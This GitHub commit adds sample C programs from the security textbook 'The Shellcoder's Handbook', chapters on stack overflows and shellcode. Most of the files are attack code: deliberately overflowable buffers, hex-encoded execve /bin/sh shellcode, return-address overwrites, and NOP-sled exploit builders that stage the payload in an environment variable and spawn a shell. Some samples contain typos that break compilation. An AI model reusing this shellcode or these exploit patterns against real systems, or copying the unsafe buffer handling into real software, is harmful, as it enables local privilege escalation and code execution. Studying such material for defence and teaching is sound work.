add Sample Code extracted from http://media.wiley.com/product_ancilla…

…ry/83/07645446/DOWNLOAD/Source_Files.zip
devzero2000 · Jan 22, 2014 · 9da300b · 9da300b
1 parent 5cda410
commit 9da300b
Show file tree

Hide file tree

Showing 99 changed files with 8,294 additions and 0 deletions.
diff --git a/Chapter_02/Shellcoders02sampleprogram01.c b/Chapter_02/Shellcoders02sampleprogram01.c
@@ -0,0 +1,21 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 2: Stack Overflows
+Sample Program #1
+
+Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com 
+
+*/
+
+int main () {
+
+    int array[5] = {1, 2, 3, 4, 5};
+
+    printf(“%d\n”, array[5];
+}
diff --git a/Chapter_02/Shellcoders02sampleprogram02.c b/Chapter_02/Shellcoders02sampleprogram02.c
@@ -0,0 +1,25 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 2: Stack Overflows
+Sample Program #2
+
+Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com 
+
+*/
+
+int main () {
+
+    int array[5];
+    int i;
+
+    for (i = 0; i <= 255; ++i){
+            array[i] = 10;
+    }
+}
+
diff --git a/Chapter_02/Shellcoders02sampleprogram03.c b/Chapter_02/Shellcoders02sampleprogram03.c
@@ -0,0 +1,27 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 2: Stack Overflows
+Sample Program #3
+
+Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com 
+
+*/
+
+void function(int a, int b){
+     int array[5];
+}
+
+main()
+{
+ function(1,2);
+
+ printf("This is where the return address points”);
+}
+
+
diff --git a/Chapter_02/Shellcoders02sampleprogram04.c b/Chapter_02/Shellcoders02sampleprogram04.c
@@ -0,0 +1,33 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 2: Stack Overflows
+Sample Program #4
+
+Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com 
+
+*/
+
+void return_input (void){ 
+        char array[30]; 
+
+        gets (array); 
+        printf("%s\n", array); 
+
+}
+
+
+main() { 
+        return_input(); 
+
+        return 0; 
+
+}
+
+
+
diff --git a/Chapter_02/Shellcoders02sampleprogram05.c b/Chapter_02/Shellcoders02sampleprogram05.c
@@ -0,0 +1,32 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 2: Stack Overflows
+Sample Program #5
+
+Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com 
+
+*/
+
+char shellcode[] =    
+ "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
+ "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
+ "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
+
+
+int main()
+{
+
+  int *ret;
+  ret = (int *)&ret + 2;
+  (*ret) = (int)shellcode;
+}
+
+
+
+
diff --git a/Chapter_02/Shellcoders02sampleprogram06.c b/Chapter_02/Shellcoders02sampleprogram06.c
@@ -0,0 +1,64 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 2: Stack Overflows
+Sample Program #6
+
+Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdlib.h>
+
+#define offset_size                    0
+#define buffer_size                    512
+
+char sc[] =
+  "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
+  "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
+  "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
+
+
+unsigned long find_start(void) {
+   __asm__("movl %esp,%eax");
+}
+
+int main(int argc, char *argv[]) 
+{
+  char *buff, *ptr;
+  long *addr_ptr, addr;
+  int offset=offset_size, bsize=buffer_size;
+  int i;
+
+  if (argc > 1) bsize  = atoi(argv[1]);
+  if (argc > 2) offset = atoi(argv[2]);
+
+  addr = find_start() - offset;
+  printf("Attempting address: 0x%x\n", addr);
+
+  ptr = buff;
+  addr_ptr = (long *) ptr;
+  for (i = 0; i < bsize; i+=4)
+       *(addr_ptr++) = addr;
+
+  ptr += 4;
+
+  for (i = 0; i < strlen(sc); i++)
+          *(ptr++) = sc[i];
+
+  buff[bsize - 1] = '\0';
+
+  memcpy(buff,"BUF=",4);
+  putenv(buff);
+  system("/bin/bash");
+}
+
+
+
+
+
diff --git a/Chapter_02/Shellcoders02sampleprogram07.c b/Chapter_02/Shellcoders02sampleprogram07.c
@@ -0,0 +1,70 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 2: Stack Overflows
+Sample Program #7
+
+Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdlib.h>
+
+ #define DEFAULT_OFFSET                    0
+ #define DEFAULT_BUFFER_SIZE             512
+ #define NOP                            0x90
+
+ char shellcode[] =
+
+     "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
+     "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
+     "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
+
+
+unsigned long get_sp(void) {
+   __asm__("movl %esp,%eax");
+}
+
+void main(int argc, char *argv[]) 
+{
+  char *buff, *ptr;
+  long *addr_ptr, addr;
+  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
+  int i;
+
+  if (argc > 1) bsize  = atoi(argv[1]);
+  if (argc > 2) offset = atoi(argv[2]);
+
+  if (!(buff = malloc(bsize))) {
+        printf("Can't allocate memory.\n");
+        exit(0);
+  }
+
+  addr = get_sp() - offset;
+  printf("Using address: 0x%x\n", addr);
+
+  ptr = buff;
+  addr_ptr = (long *) ptr;
+  for (i = 0; i < bsize; i+=4)
+         *(addr_ptr++) = addr;
+
+  for (i = 0; i < bsize/2; i++)
+         buff[i] = NOP;
+
+  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
+  for (i = 0; i < strlen(shellcode); i++)
+         *(ptr++) = shellcode[i];
+
+  buff[bsize - 1] = '\0';
+
+  memcpy(buff,"BUF=",4);
+  putenv(buff);
+  system("/bin/bash");
+}
+
+
diff --git a/Chapter_03/Shellcoders03sampleprogram01.c b/Chapter_03/Shellcoders03sampleprogram01.c
@@ -0,0 +1,26 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 3: Shellcode
+Sample Program #1
+
+Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com 
+
+*/
+
+char shellcode[] = "\xbb\x00\x00\x00\x00"           
+                   "\xb8\x01\x00\x00\x00"                  
+                   "\xcd\x80"; 
+
+int main()
+{
+  int *ret;
+  ret = (int *)&ret + 2;
+  (*ret) = (int)shellcode;
+}
+
diff --git a/Chapter_03/Shellcoders03sampleprogram02.c b/Chapter_03/Shellcoders03sampleprogram02.c
@@ -0,0 +1,28 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 3: Shellcode
+Sample Program #2
+
+Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com 
+
+*/
+
+char shellcode[] = "\xbb\x00\x00\x00\x00"           
+                   "\xb8\xfc\x00\x00\x00"                  
+                   "\xcd\x80";                  
+
+int main()
+{
+
+  int *ret;
+  ret = (int *)&ret + 2;
+  (*ret) = (int)shellcode;
+}
+
+
diff --git a/Chapter_03/Shellcoders03sampleprogram03.c b/Chapter_03/Shellcoders03sampleprogram03.c
@@ -0,0 +1,31 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 3: Shellcode
+Sample Program #3
+
+Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com 
+
+*/
+
+char shellcode[] =    
+        "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
+        "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
+        "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x41\x41\x41\x41"
+        "\x4b\x4b\x4b\x4b";               
+
+int main()
+{
+
+  int *ret;
+  ret = (int *)&ret + 2;
+  (*ret) = (int)shellcode;
+}
+
+
+